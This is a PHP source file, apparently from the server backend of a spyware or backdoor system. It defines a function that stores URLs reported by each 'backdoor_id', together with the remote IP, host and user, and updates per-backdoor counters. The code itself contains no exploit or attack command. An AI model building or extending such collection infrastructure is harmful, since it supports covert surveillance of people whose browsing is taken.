<?php

//////////
///
///   log_url.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_url.add'] = array('func'   => 'log_url_add',
                           'perm'   => AL_SERV,
                           'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_url_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= [domain(url)]
   // varchar2  <= [page(url)]
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= url
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`longtext1`) ";
   $sql .= "VALUES ('$backdoor_id', 'URL', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      preg_match('{^(?:[a-z]+://)?(?:[^/]*@)?(?P<page>(?P<domain>[a-z0-9.-]+)[^?]*)}i', $log['url'], $matches);
      $domain = (isset($matches['domain']) ? $matches['domain'] : '');
      $page = (isset($matches['page']) ? $matches['page'] : '');

      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $domain),
                      array('t' => 's', 'v' => $page),
                      array('t' => 's', 'v' => $log['url']));

      $ret = db_execute($stmt, $params);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `url` = `url` + 1, ";
      $sql .=     "`url_new` = `url_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
